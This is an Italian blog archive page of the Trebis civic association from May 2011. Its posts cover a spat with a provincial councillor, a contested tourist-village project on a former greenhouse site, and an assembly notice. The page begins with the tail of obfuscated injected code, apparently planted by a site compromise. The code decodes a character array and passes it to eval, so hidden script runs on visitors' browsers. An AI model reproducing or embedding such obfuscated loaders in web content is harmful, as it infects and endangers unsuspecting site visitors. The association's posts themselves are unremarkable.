q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Maggio, 2011

Dott. Carlo Antonini, la mosca e il bue

admin Maggio 10th, 2011

Cari Soci
Come sappiamo tutti, la Trebis è un’associazione apartitica.

Ogni socio è libero di esprimere la propria appartenenza politica come più gli aggrada, mentre l’associazione è e rimane estranea ad ogni coinvolgimento politico/partitico, come è accaduto anche nella presente fase elettorale

Negli ultimi anni la Trebis ha mandato varie lettere all’amministrazione, suggerendo, ammonendo, protestando. Mai, neanche una volta, l’amministrazione ha avuto la cortesia di rispondere, nemmeno con una nota formale per accusare ricevuta. Ora, invece - e, guarda caso, solo pochi giorni prima delle elezioni amministrative - , il dott. Carlo Antonini, assessore provinciale per il PD, ha scritto un messaggio al nostro sito commentando il comunicato di qualche giorno fa sull’apparente abbandono del progetto per un villaggio turistico (in realtà solo speculazione edilizia) sul terreno delle ex-serre, sostituito da un “polo di energia alternativa”; in detto comunicato avevamo anche espresso soddisfazione per il fatto che, senza la nostra opposizione al progetto, probabilmente il finto villaggio sarebbe già completato oppure in fase di costruzione.

 

Ecco il messaggio del dott. Antonini:

<<Cari amici di Trebis ( o dovrei dire di SEL ?? ), in merito al vostro comunicato sulle “ex serre”, cosciente che le idee hanno una forza propria e senza minimamente avere intenzione di offendere, mi viene in mente una frase dello stupendo dialetto napoletano: A’ MOSCA N’COPP O’ BOV’ DICETT’ : ” IAMM ARA’ ” Sempre disponibile al confronto. Cordialmente Carlo Antonini.>>

Tradotta in italiano la frase suona più o meno così: la mosca in cima al bue disse:andiamo ad arare.

Nel ribadire che la Trebis non è la SEL, come non è il PD nè altro partito, il Consiglio direttivo considera la battuta apparentemente spiritosa del dott. Antonini non solo offensiva ma anche arrogante, frutto di un potere che non sopporta critiche né accetta contributi disinteressati da parte della società civile, di cui tanto si reclama a parole la partecipazione, ma che nei fatti non viene tenuta in alcuna considerazione per la serie “non disturbate il manovratore”.

Il dott. Antonini forse non conosce l’altro detto: “una mosca uccide anche un cavallo” (o bue che sia), per cui la Trebis, quando e dove necessario, continuerà a pungere, confidando naturalmente che la prossima amministrazione, qualunque sia la sua composizione, sia più sensibile, intelligente e democratica del bue.

Le ex serre: una vittoria per la Trebis?

admin Maggio 2nd, 2011

L’annuncio della sospensione del progetto per un finto “villaggio turistico” sul sito delle ex serre sarebbe apparentemente una fonte di soddisfazione per la Trebis, che si è costituita quattro anni fa proprio per combattere quella iniziativa mostruosa.

La ditta Pietrarossa Inn, proprietaria del sito, ha chiesto in uno scritto formale all’Amministrazione Comunale solo la “temporanea sospensione” del’iter burocratico del “villaggio”, mantenendosi aperta una via d’uscita per ogni evenienza.

Questo annuncio della proprietà, che tra l’altro propone, in sostituzione del megaprogetto, un “polo di energia alternativa” su quel sito, va preso con grande cautela, soprattutto perchè arriva in questo periodo preelettorale.

Sembra che alla base della nuova proposta vi sia anche la crisi economica, che rende velleitari progetti di proporzioni gigantesche come il “villaggio” in questione, il quale non è altro, secondo noi, che una gigantesca speculazione edilizia.

Su questo punto possiamo veramente cantare vittoria, perché se con la nostra azione non fossimo riusciti a ritardare l’approvazione del progetto per vari anni, avremmo ora un centinaio di villette e costruzioni incomplete o vuote su un sito importante della fascia pedecollinare.

Il nostro compito ora è di vigilare su due fronti; il primo che non si riprenda, dopo le elezioni, l’iter di approvazione della variante riguardante il progetto delle cento villette, il secondo che gli impianti di energia alternativa - probabilmente pannelli fotovoltaici – siano collocati, come ha promesso la ditta Pietrarossa Inn, “con la massima attenzione a tutti gli aspetti ambientali legati a tale area.”

Un mare ininterrotto di pannelli, come sono sorti in America e ora anche in Europa, distruggerebbe la bellezza della nostra valle. Anche queste scelte, dunque, all’apparenza così “ecologiche”, necessitano di una visione complessiva del territorio e dei problemi paesaggistici di cui dovrà farsi carico la nuova amministrazione.

Trebis come sempre darà il suo contributo.

Assemblea ordinaria

admin Maggio 2nd, 2011

Cari Soci
si sta avvicinando il momento di rinnovare il Consiglio Direttivo della Trebis e anche di discutere il nostro programma per i prossimi mesi. L’assemblea della Trebis si terrà quindi venerdi 10 giugno nella sala della ditta “Il Frantoio” (Olio Trevi) alle ore 21.00. Invitiamo tutti i soci con ad avanzare proposte per nuovi candidati al Consiglio e nuove idee per le nostre attivita in futuro.